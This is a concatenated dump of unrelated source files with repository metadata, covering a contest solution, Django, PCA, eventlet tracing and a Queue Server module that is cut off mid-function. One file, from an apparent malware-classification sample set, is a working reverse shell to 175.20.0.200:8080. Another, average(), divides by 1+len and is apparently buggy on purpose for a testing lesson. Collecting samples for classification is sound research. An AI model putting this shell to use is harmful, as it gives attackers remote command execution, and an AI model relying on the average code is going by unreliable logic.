89e8c2862eb94d0971d240632f6c974a62b9c46d | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_5658282861527040_0/Python/xsot/b.py | 837b18be5ec2789529bff938d391f3cd34053ff6 | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 255 | py | for TC in range(1, int(raw_input()) + 1):
a, b, k = map(int, raw_input().split())
ans = 0
for i in range(a):
for j in range(b):
if i&j < k:
ans += 1
print "Case #%d: %d" % (TC, ans) | [
"[email protected]"
] | |
0682516f2179e263d15d82dac220ebb9ffc32e3a | 575d197af5bbc31b89df37f8733e81707294948c | /testing/examples/pytest/average02/average.py | 7712c0b8238a9ff4df9a5ca62e89b42e9e85eee6 | [] | no_license | tisnik/python-programming-courses | 5c7f1ca9cae07a5f99dd8ade2311edb30dc3e088 | 4e61221b2a33c19fccb500eb5c8cdb49f5b603c6 | refs/heads/master | 2022-05-13T07:51:41.138030 | 2022-05-05T15:37:39 | 2022-05-05T15:37:39 | 135,132,128 | 3 | 2 | null | 2021-04-06T12:19:16 | 2018-05-28T08:27:19 | Python | UTF-8 | Python | false | false | 158 | py | """Výpočet průměru."""
def average(x):
"""Výpočet průměru ze seznamu hodnot předaných v parametru x."""
return sum(x) / float(1 + len(x))
| [
"[email protected]"
] | |
4d0dac39959fe9af6b0ac34deb4b198a2b0eb6eb | b580fd482147e54b1ca4f58b647fab016efa3855 | /host_im/mount/malware-classification-master/samples/virus/sample_bad239.py | a5aa6c4e78002837e16dae145993a43d6d06ef7e | [] | no_license | Barnsa/Dissertation | 1079c8d8d2c660253543452d4c32799b6081cfc5 | b7df70abb3f38dfd446795a0a40cf5426e27130e | refs/heads/master | 2022-05-28T12:35:28.406674 | 2020-05-05T08:37:16 | 2020-05-05T08:37:16 | 138,386,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 288 | py | import socket
import lzma
import subprocess
import crypt
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("175.20.0.200",8080))
while not False:
command = s.recv(1024).decode("utf-8")
if not command: break
data = subprocess.check_output(command, shell=True)
s.send(data)
| [
"[email protected]"
] | |
a0da9721a3949e0987120a926d9073cf5045f418 | f68065baf489013c926dcfea9994878716d19586 | /manage.py | 15344070d0319c35fadbabae09a94c0ef757a5c3 | [] | no_license | groyce/pots | 06667fdc686b74a897c42879cbed5803e9efb154 | ac839943c84c3135cb4596a8f734e4a061086e10 | refs/heads/master | 2020-04-10T01:42:55.863071 | 2018-12-06T19:47:18 | 2018-12-06T19:47:18 | 160,723,310 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 540 | py | #!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'TinyPots.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| [
"[email protected]"
] | |
0de92bbf70351c4902859d65773f4d634b5846de | 42fdf741bf64ea2e63d1546bb08356286f994505 | /macrocab_ex1/rasp30a_gen8.py | 77a2b1bf37536997c1508fe95edb997127f4633c | [] | no_license | skim819/RASP_Workspace_sihwan | 7e3cd403dc3965b8306ec203007490e3ea911e3b | 0799e146586595577c8efa05c647b8cb92b962f4 | refs/heads/master | 2020-12-24T05:22:25.775823 | 2017-04-01T22:15:18 | 2017-04-01T22:15:18 | 41,511,563 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,439 | py | self.dev_pins = {'fgota_in':2,'ota_buf_in':1,'ota_in':2, 'cap_in':1, 'nfet_in':2, 'pfet_in':2,'tgate_in':2,'mux4_1_in':8, 'nmirror_in':1,'ladder_blk_in':2, 'c4_blk_in':2,'Nagating_blk_in':2,'speech_in':3,'gnd_out_in':2,'vdd_out_in':2,'in2in_x1_in':3,'in2in_x6_in':13,'volt_div_in':2,'integrator_in':3,'integrator_nmirror_in':3,'INFneuron_in':3,'lpf_in':1,'nfet_i2v_in':1,'pfet_i2v_in':1,'peak_detector_in':2,'ramp_fe_in':1,'sigma_delta_fe_in':3,'cap_sense_in':2,'HOP_bif_in':1,'lpf_2_in':1,'hhneuron_in':4,'h_rect_in':2,'hh_neuron_b_debug_in':4,'dendiff_in':6,'switch_cap_in':5,'common_source1_in':1,'common_drain_in':2,'TIA_blk_in':1,'ladder_filter_in':2, 'ichar_nfet_in':2,'bias_gen_in':1,'inv_mcab_in':1,'fgota_out':1,'ota_buf_out':1,'ota_out':1, 'cap_out':1, 'nfet_out':1, 'pfet_out':1,'tgate_out':1,'mux4_1_out':1, 'nmirror_out':1,'ladder_blk_out':2, 'c4_blk_out':1,'Nagating_blk_out':1,'speech_out':2,'gnd_out_out':1,'vdd_out_out':1,'in2in_x1_out':1,'in2in_x6_out':1,'volt_div_out':1,'integrator_out':1,'integrator_nmirror_out':1,'INFneuron_out':1,'lpf_out':1,'nfet_i2v_out':1,'pfet_i2v_out':1,'peak_detector_out':1,'ramp_fe_out':1,'sigma_delta_fe_out':1,'cap_sense_out':1,'HOP_bif_out':1,'lpf_2_out':1,'hhneuron_out':3,'h_rect_out':1,'hh_neuron_b_debug_out':3,'dendiff_out':1,'switch_cap_out':1,'common_source1_out':1,'common_drain_out':1,'TIA_blk_out':1,'ladder_filter_out':3,'ichar_nfet_out':1,'bias_gen_out':2,'inv_mcab_out':1}
| [
"ubuntu@ubuntu-VirtualBox.(none)"
] | ubuntu@ubuntu-VirtualBox.(none) |
54c53c759cd37e22b3b3f9b8db78a68f122b8701 | e0660d7a6125bece559e1564921dd29fe0f1506c | /hexlistserver/forms/textarea.py | a1f2ae9adcfe4d66835f2d99a080a495476c179d | [] | no_license | yvan/hexlistserver | ba0b661941549cfce1d5fd5a36ad908a9872238a | cf96508bc7b926eba469629254e4b5cc81470af3 | refs/heads/master | 2021-01-19T10:08:32.833174 | 2017-08-04T03:46:29 | 2017-08-04T03:46:29 | 55,884,098 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 294 | py | from flask.ext.wtf import Form
from wtforms.fields import TextAreaField, SubmitField
from wtforms.validators import DataRequired
class TextareaForm(Form):
links = TextAreaField('Links', validators=[DataRequired()], render_kw={"placeholder": "Put your links here..."})
'''
author @yvan
''' | [
"[email protected]"
] | |
f8146ab2ae40e6fc2848bac16c862804609f2c02 | e21c70d5b03633b4e0a89dfccb0cb8ccd88612d0 | /venv/lib/python3.5/site-packages/eventlet/zipkin/http.py | 668c3f9e380a1d9abd740ffae72959c8b26fde56 | [
"MIT"
] | permissive | LavanyaRamkumar/Networking-app_Dynamic-Quiz | 4d5540088b1e2724626dda8df0fd83442391b40f | 4de8329845712864d3cc8e8b81cfce5a1207224d | refs/heads/master | 2023-02-09T12:08:19.913354 | 2019-10-26T04:23:54 | 2019-10-26T04:23:54 | 173,337,916 | 1 | 1 | MIT | 2023-02-02T04:48:55 | 2019-03-01T16:56:13 | Python | UTF-8 | Python | false | false | 1,789 | py | import warnings
from eventlet.support import six
from eventlet.green import httplib
from eventlet.zipkin import api
# see https://twitter.github.io/zipkin/Instrumenting.html
HDR_TRACE_ID = 'X-B3-TraceId'
HDR_SPAN_ID = 'X-B3-SpanId'
HDR_PARENT_SPAN_ID = 'X-B3-ParentSpanId'
HDR_SAMPLED = 'X-B3-Sampled'
if six.PY2:
__org_endheaders__ = httplib.HTTPConnection.endheaders
__org_begin__ = httplib.HTTPResponse.begin
def _patched_endheaders(self):
if api.is_tracing():
trace_data = api.get_trace_data()
new_span_id = api.generate_span_id()
self.putheader(HDR_TRACE_ID, hex_str(trace_data.trace_id))
self.putheader(HDR_SPAN_ID, hex_str(new_span_id))
self.putheader(HDR_PARENT_SPAN_ID, hex_str(trace_data.span_id))
self.putheader(HDR_SAMPLED, int(trace_data.sampled))
api.put_annotation('Client Send')
__org_endheaders__(self)
def _patched_begin(self):
__org_begin__(self)
if api.is_tracing():
api.put_annotation('Client Recv (%s)' % self.status)
def patch():
if six.PY2:
httplib.HTTPConnection.endheaders = _patched_endheaders
httplib.HTTPResponse.begin = _patched_begin
if six.PY3:
warnings.warn("Since current Python thrift release \
doesn't support Python 3, eventlet.zipkin.http \
doesn't also support Python 3 (http.client)")
def unpatch():
if six.PY2:
httplib.HTTPConnection.endheaders = __org_endheaders__
httplib.HTTPResponse.begin = __org_begin__
if six.PY3:
pass
def hex_str(n):
"""
Thrift uses a binary representation of trace and span ids
HTTP headers use a hexadecimal representation of the same
"""
return '%0.16x' % (n,)
| [
"[email protected]"
] | |
7a06df65bbaae64fd9ecbf76bb2480bf468a18c2 | 2b42b40ae2e84b438146003bf231532973f1081d | /spec/mgm4458983.3.spec | 5ca4f04f24e0cf6983e0d97f1038bad1c47f41fd | [] | no_license | MG-RAST/mtf | 0ea0ebd0c0eb18ec6711e30de7cc336bdae7215a | e2ddb3b145068f22808ef43e2bbbbaeec7abccff | refs/heads/master | 2020-05-20T15:32:04.334532 | 2012-03-05T09:51:49 | 2012-03-05T09:51:49 | 3,625,755 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 14,694 | spec | {
"id": "mgm4458983.3",
"metadata": {
"mgm4458983.3.metadata.json": {
"format": "json",
"provider": "metagenomics.anl.gov"
}
},
"providers": {
"metagenomics.anl.gov": {
"files": {
"100.preprocess.info": {
"compression": null,
"description": null,
"size": 736,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/100.preprocess.info"
},
"100.preprocess.passed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 1096684,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/100.preprocess.passed.fna.gz"
},
"100.preprocess.passed.fna.stats": {
"compression": null,
"description": null,
"size": 310,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/100.preprocess.passed.fna.stats"
},
"100.preprocess.removed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 9917,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/100.preprocess.removed.fna.gz"
},
"100.preprocess.removed.fna.stats": {
"compression": null,
"description": null,
"size": 303,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/100.preprocess.removed.fna.stats"
},
"205.screen.h_sapiens_asm.info": {
"compression": null,
"description": null,
"size": 479,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/205.screen.h_sapiens_asm.info"
},
"205.screen.h_sapiens_asm.removed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 224,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/205.screen.h_sapiens_asm.removed.fna.gz"
},
"299.screen.info": {
"compression": null,
"description": null,
"size": 410,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/299.screen.info"
},
"299.screen.passed.fna.gcs": {
"compression": null,
"description": null,
"size": 2880,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/299.screen.passed.fna.gcs"
},
"299.screen.passed.fna.gz": {
"compression": "gzip",
"description": null,
"size": 761807,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/299.screen.passed.fna.gz"
},
"299.screen.passed.fna.lens": {
"compression": null,
"description": null,
"size": 550,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/299.screen.passed.fna.lens"
},
"299.screen.passed.fna.stats": {
"compression": null,
"description": null,
"size": 310,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/299.screen.passed.fna.stats"
},
"440.cluster.rna97.fna.gz": {
"compression": "gzip",
"description": null,
"size": 50751,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/440.cluster.rna97.fna.gz"
},
"440.cluster.rna97.fna.stats": {
"compression": null,
"description": null,
"size": 308,
"type": "fasta",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/440.cluster.rna97.fna.stats"
},
"440.cluster.rna97.info": {
"compression": null,
"description": null,
"size": 947,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/440.cluster.rna97.info"
},
"440.cluster.rna97.mapping": {
"compression": null,
"description": null,
"size": 1185727,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/440.cluster.rna97.mapping"
},
"440.cluster.rna97.mapping.stats": {
"compression": null,
"description": null,
"size": 50,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/440.cluster.rna97.mapping.stats"
},
"450.rna.expand.lca.gz": {
"compression": "gzip",
"description": null,
"size": 411704,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/450.rna.expand.lca.gz"
},
"450.rna.expand.rna.gz": {
"compression": "gzip",
"description": null,
"size": 103029,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/450.rna.expand.rna.gz"
},
"450.rna.sims.filter.gz": {
"compression": "gzip",
"description": null,
"size": 63571,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/450.rna.sims.filter.gz"
},
"450.rna.sims.gz": {
"compression": "gzip",
"description": null,
"size": 710312,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/450.rna.sims.gz"
},
"900.abundance.function.gz": {
"compression": "gzip",
"description": null,
"size": 33167,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/900.abundance.function.gz"
},
"900.abundance.lca.gz": {
"compression": "gzip",
"description": null,
"size": 20292,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/900.abundance.lca.gz"
},
"900.abundance.md5.gz": {
"compression": "gzip",
"description": null,
"size": 42602,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/900.abundance.md5.gz"
},
"900.abundance.ontology.gz": {
"compression": "gzip",
"description": null,
"size": 43,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/900.abundance.ontology.gz"
},
"900.abundance.organism.gz": {
"compression": "gzip",
"description": null,
"size": 62716,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/900.abundance.organism.gz"
},
"900.loadDB.sims.filter.seq": {
"compression": null,
"description": null,
"size": 10754984,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/900.loadDB.sims.filter.seq"
},
"900.loadDB.source.stats": {
"compression": null,
"description": null,
"size": 129,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/900.loadDB.source.stats"
},
"999.done.COG.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/999.done.COG.stats"
},
"999.done.KO.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/999.done.KO.stats"
},
"999.done.NOG.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/999.done.NOG.stats"
},
"999.done.Subsystems.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/999.done.Subsystems.stats"
},
"999.done.class.stats": {
"compression": null,
"description": null,
"size": 1320,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/999.done.class.stats"
},
"999.done.domain.stats": {
"compression": null,
"description": null,
"size": 40,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/999.done.domain.stats"
},
"999.done.family.stats": {
"compression": null,
"description": null,
"size": 4792,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/999.done.family.stats"
},
"999.done.genus.stats": {
"compression": null,
"description": null,
"size": 7124,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/999.done.genus.stats"
},
"999.done.order.stats": {
"compression": null,
"description": null,
"size": 2483,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/999.done.order.stats"
},
"999.done.phylum.stats": {
"compression": null,
"description": null,
"size": 548,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/999.done.phylum.stats"
},
"999.done.rarefaction.stats": {
"compression": null,
"description": null,
"size": 23194,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/999.done.rarefaction.stats"
},
"999.done.sims.stats": {
"compression": null,
"description": null,
"size": 80,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/999.done.sims.stats"
},
"999.done.species.stats": {
"compression": null,
"description": null,
"size": 21667,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4458983.3/file/999.done.species.stats"
}
},
"id": "mgm4458983.3",
"provider": "metagenomics.anl.gov",
"providerId": "mgm4458983.3"
}
},
"raw": {
"mgm4458983.3.fna.gz": {
"compression": "gzip",
"format": "fasta",
"provider": "metagenomics.anl.gov",
"url": "http://api.metagenomics.anl.gov/reads/mgm4458983.3"
}
}
} | [
"[email protected]"
] | |
be328f37bac951c2c72b62235422e71d7b99017c | a2fae6522c0526e81032d700e750dbc4b55e308b | /twemoir/lib/states2/__init__.py | ad34e59f727359c8bb1bafd873c6013ba561029b | [
"BSD-2-Clause"
] | permissive | fish2000/django-twemoir | e895039e4ecd0a01baa9e35002fe0e00e20f6a4f | 8caa7e5319055f54e0d89457780605994622e8d9 | refs/heads/master | 2020-06-05T13:16:47.036385 | 2014-01-21T02:42:30 | 2014-01-21T02:42:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 601 | py | '''
State engine for django models.
Define a state graph for a model and remember the state of each object.
State transitions can be logged for objects.
'''
#: The version list
VERSION = (1, 4, 4)
def get_version():
'''
Converts the :attr:`VERSION` into a nice string
'''
if len(VERSION) > 3 and VERSION[3] not in ('final', ''):
return '%s.%s.%s %s' % (VERSION[0], VERSION[1], VERSION[2], VERSION[3])
else:
return '%s.%s.%s' % (VERSION[0], VERSION[1], VERSION[2])
#: The actual version number, used by python (and shown in sentry)
__version__ = get_version()
| [
"[email protected]"
] | |
46b1e5157ab927f5cf441af52490723e1d448632 | d452e34253561a47b974e260dabd8dcda6e750a2 | /unsupervised_learning/0x00-dimensionality_reduction/0-pca.py | 739e7c1866a674e0f51ec93dfdd3ee6b953d63c2 | [] | no_license | JohnCook17/holbertonschool-machine_learning | 57fcb5b9d351826c3e3d5478b3b4fbe16cdfac9f | 4200798bdbbe828db94e5585b62a595e3a96c3e6 | refs/heads/master | 2021-07-07T10:16:21.583107 | 2021-04-11T20:38:33 | 2021-04-11T20:38:33 | 255,424,823 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 513 | py | #!/usr/bin/env python3
"""PCA of an array to reduce the number of features"""
import numpy as np
def pca(X, var=0.95):
"""performs pca on a matrix"""
W, V = np.linalg.eig(np.matmul(X.T, X))
W_idx = W.argsort()[::-1]
V = V[:, W_idx]
# print(V)
V_var = np.copy(V)
V_var *= 1 / np.abs(V_var).max()
# print(V_var)
V_idx = V[np.where(np.abs(V_var) >= var, True, False)]
# print(V_idx.shape)
V_idx = len(V_idx)
# print(V[:, :V_idx].shape)
return V[:, :V_idx] * -1.
| [
"[email protected]"
] | |
46c61bb76012d57e00ff1f1e762fe9ef6c1731eb | 95fd6bb4126edbd36a79ba87b8cb4f0e2149e4e1 | /tests/test_pyca.py | bdab377dc1090dbe408f12da0b97db5995796cc4 | [
"MIT"
] | permissive | secondguard/secondguard-python | a091357932ffa55e0bae74149c552781d87a3493 | 392d33ee40a9982ad912210152f4b2d44fa5ef1a | refs/heads/master | 2022-12-10T11:31:31.972938 | 2020-08-04T16:23:47 | 2020-08-04T16:23:47 | 277,826,214 | 6 | 1 | MIT | 2022-12-08T11:05:21 | 2020-07-07T13:36:49 | Python | UTF-8 | Python | false | false | 1,416 | py | from base64 import b64decode
from os import urandom
from secondguard.pyca import (
symmetric_encrypt,
symmetric_decrypt,
asymmetric_encrypt,
asymmetric_decrypt,
)
# TODO: move to a setup class?
from tests.utils import PUBKEY_STR, PRIVKEY_STR, _fetch_testing_pubkey
# TODO: come up with less HACKey way to test many times
# TODO: add static decrypt test vectors
def perform_symmetric_encryption_decryption(num_bytes=1000):
secret = urandom(num_bytes)
ciphertext, key = symmetric_encrypt(secret)
recovered_secret = symmetric_decrypt(ciphertext=ciphertext, key=key)
assert secret == recovered_secret
def test_symmetric(cnt=100):
for attempt in range(cnt):
perform_symmetric_encryption_decryption(num_bytes=attempt * 100)
def perform_asymmetric_encryption_decryption(rsa_privkey, rsa_pubkey, secret):
ciphertext_b64 = asymmetric_encrypt(bytes_to_encrypt=secret, rsa_pubkey=PUBKEY_STR)
assert len(b64decode(ciphertext_b64)) == 512
recovered_secret = asymmetric_decrypt(
ciphertext_b64=ciphertext_b64, rsa_privkey=PRIVKEY_STR
)
assert secret == recovered_secret
def test_asymmetric(cnt=10):
for _ in range(cnt):
# This represents the info you're trying to protect:
secret = urandom(64)
perform_asymmetric_encryption_decryption(
rsa_privkey=PRIVKEY_STR, rsa_pubkey=PUBKEY_STR, secret=secret
)
| [
"[email protected]"
] | |
52cd7955d3433c7db048edb55152a09ae1c047f1 | d1a380bbf6e290edbb1b6ac62d4d9f8c0c8f80f1 | /django_shorts.py | e3ea9f278376d6929fb2db1515603b5ce78a2d0f | [
"MIT"
] | permissive | mhadiahmed/django-shorts | 6310bf12812fab2bd4283e50ec57416b473eeff4 | 3803992455bda14e7f20327d22583c6d064fe0aa | refs/heads/main | 2023-03-17T10:11:09.655564 | 2021-03-07T09:49:28 | 2021-03-07T09:49:28 | 345,284,896 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,096 | py | #!/usr/bin/env python
import os
import sys
from subprocess import call
ALIASES = {
# Django
'c' : 'collectstatic',
'r' : 'runserver',
'sd' : 'syncdb',
'sp' : 'startproject',
'sa' : 'startapp',
't' : 'test',
# Shell
'd' : 'dbshell',
's' : 'shell',
# Auth
'csu': 'createsuperuser',
'cpw': 'changepassword',
# South
'm' : 'migrate',
'mkm' : 'makemigrations',
# session
'cs' : 'clearsessions',
# # Haystack
# 'ix' : 'update_index',
# 'rix': 'rebuild_index',
# # Django Extensions
# 'sk' : 'generate_secret_key',
# 'rdb': 'reset_db',
# 'rp' : 'runserver_plus',
# 'shp': 'shell_plus',
# 'url': 'show_urls',
# 'gm' : 'graph_models',
# 'rs' : 'runscript'
}
def run(command=None, *arguments):
"""
Run the given command.
Parameters:
:param command: A string describing a command.
:param arguments: A list of strings describing arguments to the command.
"""
if command is None:
sys.exit('django-shorts: No argument was supplied, please specify one.')
if command in ALIASES:
command = ALIASES[command]
if command == 'startproject':
return call('django-admin.py startproject {}'.format(' '.join(arguments)), shell=True)
script_path = os.getcwd()
while not os.path.exists(os.path.join(script_path, 'manage.py')):
base_dir = os.path.dirname(script_path)
if base_dir != script_path:
script_path = base_dir
else:
sys.exit('django-shorts: No \'manage.py\' script found in this directory or its parents.')
a = {
'python': sys.executable,
'script_path': os.path.join(script_path, 'manage.py'),
'command': command or '',
'arguments': ' '.join(arguments)
}
return call('{python} {script_path} {command} {arguments}'.format(**a), shell=True)
def main():
"""Entry-point function."""
try:
sys.exit(run(*sys.argv[1:]))
except KeyboardInterrupt:
sys.exit()
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
f6b28f22787ec511d9b652e833c2e15d3cb09928 | 275e770eaf9708e31d50dd62857fc52716e985af | /python/python/widget/oval progam.py | ff91cbe45a3d2fcd1111dcb9c0ae22b635ba724c | [
"MIT"
] | permissive | priyamshah112/Basic_Python | 75127744a6a25c72d2eba8e399e920509bd17ee2 | 11447cf062209de750fbe938402d738b1a5ff76c | refs/heads/master | 2021-10-10T15:43:50.151891 | 2019-01-13T13:46:40 | 2019-01-13T13:46:40 | 106,164,530 | 0 | 0 | null | 2018-10-10T19:07:16 | 2017-10-08T09:31:29 | Python | UTF-8 | Python | false | false | 182 | py | from tkinter import *
canvas_width = 190
canvas_height =150
master = Tk()
w = Canvas(master,width=canvas_width,height=canvas_height)
w.pack()
w.create_oval(50,50,100,100)
mainloop()
| [
"[email protected]"
] | |
b5efb434ce77703458f8740d6c14df96fcb10dec | da0e2a4170e41df9ab982abd4a9a9161453359b3 | /bluesky_queueserver/manager/output_streaming.py | 4eca1b9f34e40a3e3a1ca51e023ce119e8276286 | [
"BSD-3-Clause"
] | permissive | bluesky/bluesky-queueserver | a6da30e39cf63b5a5f6b8ed0d5925b255acb38bb | f7d489f01e73451b366eb8ee64a60a1a6aaeb695 | refs/heads/main | 2023-08-31T14:32:22.350524 | 2023-08-18T17:20:29 | 2023-08-18T17:20:29 | 228,529,527 | 11 | 20 | BSD-3-Clause | 2023-09-11T22:35:57 | 2019-12-17T04:02:01 | Python | UTF-8 | Python | false | false | 24,735 | py | import argparse
import asyncio
import inspect
import io
import json
import logging
import os
import sys
import threading
import time as ttime
import zmq
import bluesky_queueserver
logger = logging.getLogger(__name__)
qserver_version = bluesky_queueserver.__version__
default_zmq_info_address_for_server = "tcp://*:60625"
default_zmq_info_address = "tcp://localhost:60625"
class ConsoleOutputStream(io.TextIOBase):
"""
Class that implements writable text file object that collects printed console messages
and adds timestamps to messages and adds the message to the queue. The messages are
dictionaries in the form ``{"time": <timestamp>, "msg": <printed text>}.
Parameters
----------
msg_queue : multiprocessing.Queue
Reference to the queue used for collecting messages.
"""
def __init__(self, *, msg_queue):
super().__init__()
self._msg_queue = msg_queue
self._stdout = sys.__stdout__
def write(self, s):
"""
Overrides the method of ``io.TextIOBase``.
"""
s = str(s)
msg = {"time": ttime.time(), "msg": s}
self._msg_queue.put(msg)
return len(s)
def redirect_output_streams(file_obj):
"""
Override the default output streams with custom file object.
The object may be an instance of ``ConsoleOutputStream``.
Parameters
----------
file_obj : ConsoleOutputStream
Reference for the open writable file object (text output).
"""
sys.stdout = file_obj
sys.stderr = file_obj
def setup_console_output_redirection(msg_queue):
"""
Set up redirection of console output. If ``msg_queue`` is ``None``, then do nothing.
Parameters
----------
msg_queue : multiprocessing.Queue
Queue that is used to collect console output messages.
"""
if msg_queue:
fobj = ConsoleOutputStream(msg_queue=msg_queue)
redirect_output_streams(fobj)
# Disable 'colorama' (used by Bluesky). We don't need it in Queue Server.
# Colorama overrides 'sys.stdout' and interferes with capturing console output.
def do_nothing(*args, **kwargs):
...
try:
import colorama
colorama.init = do_nothing
colorama.reinit = do_nothing
except Exception:
pass
_default_zmq_console_topic = "QS_Console"
class PublishConsoleOutput:
"""
The class that is publishing the collected console output messages to 0MQ socket.
The queue is expected to be filled with messages in the format
``{"time": <timestamp>, "msg": <text message>}``. The object of the class
receives the reference to the queue during initialization. The collected messages
are published as they are added to the queue. The messages may be collected
in multiple processes.
Parameters
----------
msg_queue : multiprocessing.Queue
Reference to the queue object, used for collecting of the output messages.
The messages added to the queue will be automatically published to 0MQ socket.
console_output_on : boolean
Enable/disable printing console output to the terminal
zmq_publish_on : boolean
Enable/disable publishing console output to 0MQ socket
zmq_publish_addr : str, None
Address of 0MQ PUB socket for the publishing server. If ``None``, then
the default address ``tcp://*:60625`` is used.
zmq_topic : str
Name of the 0MQ topic where the messages are published.
name : str
Name of the thread where the messages are published.
"""
def __init__(
self,
*,
msg_queue,
console_output_on=True,
zmq_publish_on=True,
zmq_publish_addr=None,
zmq_topic=_default_zmq_console_topic,
name="RE Console Output Publisher",
):
self._thread_running = False # Set True to exit the thread
self._thread_name = name
self._msg_queue = msg_queue
self._polling_timeout = 0.1 # in sec.
self._console_output_on = console_output_on
self._zmq_publish_on = zmq_publish_on
zmq_publish_addr = zmq_publish_addr or default_zmq_info_address_for_server
self._zmq_publish_addr = zmq_publish_addr
self._zmq_topic = zmq_topic
self._socket = None
if self._zmq_publish_on:
try:
context = zmq.Context()
self._socket = context.socket(zmq.PUB)
self._socket.bind(self._zmq_publish_addr)
except Exception as ex:
logger.error(
"Failed to create 0MQ socket at %s. Console output will not be published. Exception: %s",
self._zmq_publish_addr,
ex,
)
if self._socket and self._zmq_publish_on:
logging.info("Publishing console output to 0MQ socket at %s", zmq_publish_addr)
def start(self):
"""
Start thread polling the queue.
"""
self._start_processing_thread()
def stop(self):
"""
Stop thread that polls the queue (and exit the tread)
"""
self._thread_running = False
def __del__(self):
self.stop()
if self._socket:
self._socket.close()
def _start_processing_thread(self):
# The thread should not be started of Message Queue object does not exist
if not self._thread_running and self._msg_queue:
self._thread_running = True
self._thread_conn = threading.Thread(
target=self._publishing_thread, name=self._thread_name, daemon=True
)
self._thread_conn.start()
def _publishing_thread(self):
while True:
try:
